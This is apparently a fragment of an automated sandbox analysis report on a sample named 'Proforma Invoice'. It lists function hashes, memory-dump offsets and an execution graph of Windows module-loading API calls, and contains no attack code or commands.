                                                                                                  • Instruction Fuzzy Hash: AF218375F002169FDB41CF7AD840AAEB7F5EB48610F108069E909E7390E739ED018F95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c8ccf63266a4028a43f69feb6467d91622c942b3f289e0c94b0712a1fc394f09
                                                                                                  • Instruction ID: b6d1b3c24d4b624f2ecdea3a17bdba8e4fb7775877421dca7e99fa762b34d744
                                                                                                  • Opcode Fuzzy Hash: c8ccf63266a4028a43f69feb6467d91622c942b3f289e0c94b0712a1fc394f09
                                                                                                  • Instruction Fuzzy Hash: CB215175F0021A9FDB50CF7AE940AAEB7F5EB48610F108069E909E7350E738ED418F95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4090441045.00000000011ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 011ED000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_11ed000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f75e0f9f83db221c917d0a77dc838b545fb3a2f5cdb21e460a9e80fbe13d17b0
                                                                                                  • Instruction ID: eb2d5b942693a02fd1dd51f78c88dcd38458fcb6f904574b8c3d11b6e17d0ab4
                                                                                                  • Opcode Fuzzy Hash: f75e0f9f83db221c917d0a77dc838b545fb3a2f5cdb21e460a9e80fbe13d17b0
                                                                                                  • Instruction Fuzzy Hash: 07212571504600DFCF19DF98E988B26BFA5EB84314F28C56DD80A4B296C336D446CA62
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4090441045.00000000011ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 011ED000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_11ed000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1b3d38e35ca1d03159603773a749e100c6334327aa034827fc7aafc63e33f397
                                                                                                  • Instruction ID: 93373f0be0a701855789082837f9e92ed53216b04654b177eac51d0bcbe8885a
                                                                                                  • Opcode Fuzzy Hash: 1b3d38e35ca1d03159603773a749e100c6334327aa034827fc7aafc63e33f397
                                                                                                  • Instruction Fuzzy Hash: D6218D315093C08FCB07CF64D894715BF71AB46214F28C1EBD8898F2A3C33A980ACB62
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f531f50a58d14b770a588ba2ca97d1debd0ec7f9aa0f724b77725143942e1eb9
                                                                                                  • Instruction ID: 1a8f4038f7bd2e2db7157d1af838079023eb554452bade8c9721e5ae0f4a097d
                                                                                                  • Opcode Fuzzy Hash: f531f50a58d14b770a588ba2ca97d1debd0ec7f9aa0f724b77725143942e1eb9
                                                                                                  • Instruction Fuzzy Hash: DE21E730B1012A9FDF44DA69E89069EB7B6EB84310F248039D805E7340D735ED418B91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 747ccc156c8d9b8b4ae6606e316d131bd40313fb2db6c8eff6760d9bd4dc8359
                                                                                                  • Instruction ID: 8feba0facd46862369082b1aadab8dabe1682b475bfe6219659503f6a60f6639
                                                                                                  • Opcode Fuzzy Hash: 747ccc156c8d9b8b4ae6606e316d131bd40313fb2db6c8eff6760d9bd4dc8359
                                                                                                  • Instruction Fuzzy Hash: 1011AC32A006169FCB60CFAADCC1AAFFBB3FB84210F548929E51693654D730A9558B90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 34a6b9220e6ca762812a7d50b649445d31d7f87f38c829ec23b520d0866458d9
                                                                                                  • Instruction ID: 96cc1820a950deb8f0ffb21d813b4498f1c2cb6e63b51e88d29a9838fc153faf
                                                                                                  • Opcode Fuzzy Hash: 34a6b9220e6ca762812a7d50b649445d31d7f87f38c829ec23b520d0866458d9
                                                                                                  • Instruction Fuzzy Hash: 95116531B101355FDF589669D814AAF77FAEBC8650B00853AD80AEB344DF65DD028BD1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 265377333ad132a6cf444151b6760e127c8d668d04e4366692fd597417910410
                                                                                                  • Instruction ID: e1d7b7b22d35edc484a802453da065adb518bd6f401959b05218d71347284507
                                                                                                  • Opcode Fuzzy Hash: 265377333ad132a6cf444151b6760e127c8d668d04e4366692fd597417910410
                                                                                                  • Instruction Fuzzy Hash: 8001DF71B100225BDB6895AED84971BBADADBC9710F24C83EE50EC7340DE29CD0347D5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 555771a68d5ddcd7081ea352879566cdde8f3a297e8a8b6e467142c3a1b4245b
                                                                                                  • Instruction ID: 255fb9137a4eeebdb32c8a5f4be11443f2d1fd0ba25b94cd747789209b7be898
                                                                                                  • Opcode Fuzzy Hash: 555771a68d5ddcd7081ea352879566cdde8f3a297e8a8b6e467142c3a1b4245b
                                                                                                  • Instruction Fuzzy Hash: F621C0B5D01259AFCB00DF9AD884ADEFBB4FB49314F10812AE918A7710C774A554CFA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f7cf4b8c7fd5cd186234b9bb054283a61de6279e8f6c41b979ee10d6d8490c5a
                                                                                                  • Instruction ID: 0c4e8adc33ab38132f68a53ae94c34f368d739311e862c2e04c26d9d4a99cd53
                                                                                                  • Opcode Fuzzy Hash: f7cf4b8c7fd5cd186234b9bb054283a61de6279e8f6c41b979ee10d6d8490c5a
                                                                                                  • Instruction Fuzzy Hash: CC01AD31B101221FDBA0DAADE961B2E73D5F78A754F14843DE90AC7340DE26ED038381
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2096555c7f2e0f1b05a1f626cb16c3e41c55deb22acc3f188bf90c9f66738b6e
                                                                                                  • Instruction ID: 3920049b69de047317c3975db1a88dc14f89b9cb2bb5a3e0d9e3b28e988846f8
                                                                                                  • Opcode Fuzzy Hash: 2096555c7f2e0f1b05a1f626cb16c3e41c55deb22acc3f188bf90c9f66738b6e
                                                                                                  • Instruction Fuzzy Hash: B301A236B101365BDB489969DC157EF73AADBC8650F00853AD90AE7380EF65DD0347D2
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 36e99757e980482a1427245089c8684e8bbe16b5458ddf1f2158dc08e3a32310
                                                                                                  • Instruction ID: 8ff739dfa24ba451ae154d463214dc65a39d3f51711ee92db8ac4df41fa52c13
                                                                                                  • Opcode Fuzzy Hash: 36e99757e980482a1427245089c8684e8bbe16b5458ddf1f2158dc08e3a32310
                                                                                                  • Instruction Fuzzy Hash: 7711C2B5D012599FCB00DF9AD884ADEFBB4FB49314F10812AE918A7610C374A554CFA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: dcd28fc7b304bec01372261f32d3d279fec4b1104471c1b23839d2589784c256
                                                                                                  • Instruction ID: fc2afb0cd7b74623f046554451b7aa1a752ecf53e229e3711800f59454883c93
                                                                                                  • Opcode Fuzzy Hash: dcd28fc7b304bec01372261f32d3d279fec4b1104471c1b23839d2589784c256
                                                                                                  • Instruction Fuzzy Hash: 5701C431E001699BCB68DA79C8405DEF7B5EB88710F00856AD80AE7300DA35DA42CBE1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2037d7084fee0d47427b594f4a0642ef577e4df7bf1a88e035f42b41ba4e2113
                                                                                                  • Instruction ID: d5f7477ca5f5132a1e3ef8f522831df42fcf049789b2ba0c3cf6e44db37a5c59
                                                                                                  • Opcode Fuzzy Hash: 2037d7084fee0d47427b594f4a0642ef577e4df7bf1a88e035f42b41ba4e2113
                                                                                                  • Instruction Fuzzy Hash: 8101F271B400255BDB648A6CEC94B2F63E6EBC9610F14443DE80AC7345DA25DD424396
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9f299a000e062fbbabf15257902f24ba64af6659d2de8e065c52b096ceaa54df
                                                                                                  • Instruction ID: d87010eebfacb2e0b2e783b7517c69ca0119bcdca685a10a0293485f8513dcf7
                                                                                                  • Opcode Fuzzy Hash: 9f299a000e062fbbabf15257902f24ba64af6659d2de8e065c52b096ceaa54df
                                                                                                  • Instruction Fuzzy Hash: 7301AD71B100211BDB6899AED40872FA7DADBC9710F20C83EE90EC7340DE65DD030395
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d38cd74d0359becad053e70150f4fec8d8e6a91bd6fb85c0f3468497ec2284da
                                                                                                  • Instruction ID: a17d653e1d885d299e4c776de1874f1491f090ace20281f2198cf470716a5f9e
                                                                                                  • Opcode Fuzzy Hash: d38cd74d0359becad053e70150f4fec8d8e6a91bd6fb85c0f3468497ec2284da
                                                                                                  • Instruction Fuzzy Hash: 7901FFB1B000261BDB64996CEC50B2F73EAEBCA620F20843DE80AC7344DE25DC424396
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 47edc315725c7dcd0796a4ba462af2d4342d49c82ba7c891ae894adb3e63eb87
                                                                                                  • Instruction ID: 8accf298776bed9e65b562f7167b9b3bd93eb12dec8ddfa8a011e21f9c7c8f01
                                                                                                  • Opcode Fuzzy Hash: 47edc315725c7dcd0796a4ba462af2d4342d49c82ba7c891ae894adb3e63eb87
                                                                                                  • Instruction Fuzzy Hash: 0D01A470B101211FDB64DAADD85072E73D5E78A714F10843DE50EC7340DE26DD028795
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 67a34b5b001e525c4b77b4c7a1504f0b3a0dfded94e8eb7ba9df77a5a7adc75a
                                                                                                  • Instruction ID: 1ef24f3e0df97555c363a3201e108e00f05e4e404cf19c4018eb2b4f2443bca6
                                                                                                  • Opcode Fuzzy Hash: 67a34b5b001e525c4b77b4c7a1504f0b3a0dfded94e8eb7ba9df77a5a7adc75a
                                                                                                  • Instruction Fuzzy Hash: 4F01B130A4120A9FD751EF7CE84029EBBF1FB81214F10017ED869D3380EB358952CB92
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3db7d01ea2f20d666120a339e659e3b1e61b9233864c48b54f837b0a57a2c3b3
                                                                                                  • Instruction ID: d28b6973b00bd52e19f8d2caabfb399570090f931d6b55afffb90b94a3ba2622
                                                                                                  • Opcode Fuzzy Hash: 3db7d01ea2f20d666120a339e659e3b1e61b9233864c48b54f837b0a57a2c3b3
                                                                                                  • Instruction Fuzzy Hash: 26F05E70A4120A9FD381EFB8D90026E77E6FB84204F1041798859E3354EF388D42CB92
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 51b476aed307e348d2870f252585c9c5602d15c65eb8d03d14360c2c0aebb168
                                                                                                  • Instruction ID: 35102879f5e3cfd622293bb3d1507ae13d46d4af8493f3fd567f6ca3fae11082
                                                                                                  • Opcode Fuzzy Hash: 51b476aed307e348d2870f252585c9c5602d15c65eb8d03d14360c2c0aebb168
                                                                                                  • Instruction Fuzzy Hash: F6E06870D1521A6BDF60CE71CC2174A3369D701204F1048A6CC04C7301E132EA0183A0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d1a5c7f190dc8ea0e10a5cbb8caedcabffcad93f90b28af4a4c9fc777743475e
                                                                                                  • Instruction ID: 5a2000332a06ad89309d48d8e5cb114da9a70a2192dc04af6bbd92a21dcf9f8a
                                                                                                  • Opcode Fuzzy Hash: d1a5c7f190dc8ea0e10a5cbb8caedcabffcad93f90b28af4a4c9fc777743475e
                                                                                                  • Instruction Fuzzy Hash: 37E0C270E1111AABDF50CEB1C91575A73ADD701208F2088A8DC09C7201E176EB018390
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                  • API String ID: 0-2222239885
                                                                                                  • Opcode ID: 3b5e19ece0ddd8a25e78a45bbe8bdad595a997f77798ab15af8a6eb209e27c53
                                                                                                  • Instruction ID: 0f1b6c2bbbdebc50d89ca359d94b1984d1148fda61b15f5f860e8e193a88082d
                                                                                                  • Opcode Fuzzy Hash: 3b5e19ece0ddd8a25e78a45bbe8bdad595a997f77798ab15af8a6eb209e27c53
                                                                                                  • Instruction Fuzzy Hash: EE122D30B0022ACFDB68DF79C99466EB7B2BF84704F2085A9D409AB354DB35DD85CB91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                  • API String ID: 0-3823777903
                                                                                                  • Opcode ID: b7580c778958a1d03f07a84ac26ac42cdb23772f49b71aca1e08ebc9585a64ed
                                                                                                  • Instruction ID: 4052357ad07c2156b8b9e4f83b221e4aeadb154f8732e7916cb758f7057b7e95
                                                                                                  • Opcode Fuzzy Hash: b7580c778958a1d03f07a84ac26ac42cdb23772f49b71aca1e08ebc9585a64ed
                                                                                                  • Instruction Fuzzy Hash: 8D917F30E0021ADFEB68DFA9DA4476EB7B2EF84704F10852DE801AB254DB399D45CB90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                  • API String ID: 0-390881366
                                                                                                  • Opcode ID: 8b326ab202be570c1ddef02ae4d07db1f130df74fc73ec0e5bbf7de241bb2c2f
                                                                                                  • Instruction ID: 6dd61ae090f413b732350f125e58c5debed471e978bba1c91f43b8466ff92d04
                                                                                                  • Opcode Fuzzy Hash: 8b326ab202be570c1ddef02ae4d07db1f130df74fc73ec0e5bbf7de241bb2c2f
                                                                                                  • Instruction Fuzzy Hash: FAF14F34A0021ACFDB58DF69C594A6EB7B2FF84704F20856CD815AB354DB3AEC46CB91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $^q$$^q$$^q$$^q
                                                                                                  • API String ID: 0-2125118731
                                                                                                  • Opcode ID: 7e61cbee6c8058bbdd80bb8ebe7f5163251fccb620737e71bb181d966f400078
                                                                                                  • Instruction ID: 394a24122b8e5ee19044934f3c5980aca0e2e23989809532075739e6f6e4ece7
                                                                                                  • Opcode Fuzzy Hash: 7e61cbee6c8058bbdd80bb8ebe7f5163251fccb620737e71bb181d966f400078
                                                                                                  • Instruction Fuzzy Hash: 77B14A30A1121ACFDB68DF69C59065EB7B2EF84704F24882DE805EB395DB75DC86CB90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: LR^q$LR^q$$^q$$^q
                                                                                                  • API String ID: 0-2454687669
                                                                                                  • Opcode ID: 94477dfe61d9857201bab4f1ea22e3fd56f2ca6d9a62ace3519f51b3b0c39221
                                                                                                  • Instruction ID: 010ca80482e42502bcd78f0cbd4bc1be7d9a51b0927e141000c9f0832683b91d
                                                                                                  • Opcode Fuzzy Hash: 94477dfe61d9857201bab4f1ea22e3fd56f2ca6d9a62ace3519f51b3b0c39221
                                                                                                  • Instruction Fuzzy Hash: 21510530B012168FDB58DF29C950A2AB7E2FF84700F14856DD805AF395DB35EC45CB91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $^q$$^q$$^q$$^q
                                                                                                  • API String ID: 0-2125118731
                                                                                                  • Opcode ID: 5648bf93f59c8c5b075caf6e082841cc596fe52f716ef05d5fb050563a20e443
                                                                                                  • Instruction ID: 8f01c87ca81273dcd83ed49789f97603893ce707a6d30026ac51755414ccd722
                                                                                                  • Opcode Fuzzy Hash: 5648bf93f59c8c5b075caf6e082841cc596fe52f716ef05d5fb050563a20e443
                                                                                                  • Instruction Fuzzy Hash: 2C518F30E102169FDF69DBA8D58066DB7B2EB88704F20892DDC06EB354DB35DD42CB91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:9.9%
                                                                                                  Dynamic/Decrypted Code Coverage:98.9%
                                                                                                  Signature Coverage:0%
                                                                                                  Total number of Nodes:278
                                                                                                  Total number of Limit Nodes:22
                                                                                                  execution_graph 39199 5204530 39203 5204617 39199->39203 39211 5204628 39199->39211 39200 520453f 39204 5204639 39203->39204 39205 520465c 39203->39205 39204->39205 39219 52048b0 39204->39219 39223 52048c0 39204->39223 39205->39200 39206 5204654 39206->39205 39207 5204860 GetModuleHandleW 39206->39207 39208 520488d 39207->39208 39208->39200 39212 5204639 39211->39212 39214 520465c 39211->39214 39212->39214 39217 52048b0 LoadLibraryExW 39212->39217 39218 52048c0 LoadLibraryExW 39212->39218 39213 5204654 39213->39214 39215 5204860 GetModuleHandleW 39213->39215 39214->39200 39216 520488d 39215->39216 39216->39200 39217->39213 39218->39213 39220 52048d4 39219->39220 39221 52048f9 39220->39221 39227 52042e8 39220->39227 39221->39206 39224 52048d4 39223->39224 39225 52042e8 LoadLibraryExW 39224->39225 39226 52048f9 39224->39226 39225->39226 39226->39206 39228 5204aa0 LoadLibraryExW 39227->39228 39230 5204b19 39228->39230 39230->39221 39231 7179787 39232 717983e 39231->39232 39233 7179791 39231->39233 39237 717b9c6 39233->39237 39256 717b968 39233->39256 39274 717b959 39233->39274 39238 717b954 39237->39238 39239 717b9c9 39237->39239 39247 717b8f0 39238->39247 39292 717bf94 39238->39292 39300 717c4a9 39238->39300 39304 717c449 39238->39304 39309 717c1ab 39238->39309 39321 717c24c 39238->39321 39330 717c36e 39238->39330 39335 717be2e 39238->39335 39344 717c1c4 39238->39344 39349 717bf64 39238->39349 39358 717bdd9 39238->39358 39362 717c01b 39238->39362 39367 717c2fb 39238->39367 39372 717c09c 39238->39372 39376 717bed1 39238->39376 39388 717c174 39238->39388 39239->39232 39247->39232 39257 717b982 39256->39257 39258 717bf94 4 API calls 39257->39258 39259 717c174 2 API calls 39257->39259 39260 717bed1 6 API calls 39257->39260 39261 717c09c 2 API calls 39257->39261 39262 717c2fb 2 API calls 39257->39262 39263 717c01b 2 API calls 39257->39263 39264 717bdd9 2 API calls 39257->39264 39265 717b9a6 39257->39265 39266 717bf64 4 API calls 39257->39266 39267 717c1c4 2 API calls 39257->39267 39268 717be2e 4 API calls 39257->39268 39269 717c36e 2 API calls 39257->39269 39270 717c24c 4 API calls 39257->39270 39271 717c1ab 6 API calls 39257->39271 39272 717c449 2 API calls 39257->39272 39273 717c4a9 2 API calls 39257->39273 39258->39265 39259->39265 39260->39265 39261->39265 39262->39265 39263->39265 39264->39265 39265->39232 39266->39265 39267->39265 39268->39265 39269->39265 39270->39265 39271->39265 39272->39265 39273->39265 39275 717b968 39274->39275 39276 717b9a6 39275->39276 39277 717bf94 4 API calls 39275->39277 39278 717c174 2 API calls 39275->39278 39279 717bed1 6 API calls 39275->39279 39280 717c09c 2 API calls 39275->39280 39281 717c2fb 2 API calls 39275->39281 39282 717c01b 2 API calls 39275->39282 39283 717bdd9 2 API calls 39275->39283 39284 717bf64 4 API calls 39275->39284 39285 717c1c4 2 API calls 39275->39285 39286 717be2e 4 API calls 39275->39286 39287 717c36e 2 API calls 39275->39287 39288 717c24c 4 API calls 39275->39288 39289 717c1ab 6 API calls 39275->39289 39290 717c449 2 API calls 39275->39290 39291 717c4a9 2 API calls 39275->39291 39276->39232 39277->39276 39278->39276 39279->39276 39280->39276 39281->39276 39282->39276 39283->39276 39284->39276 39285->39276 39286->39276 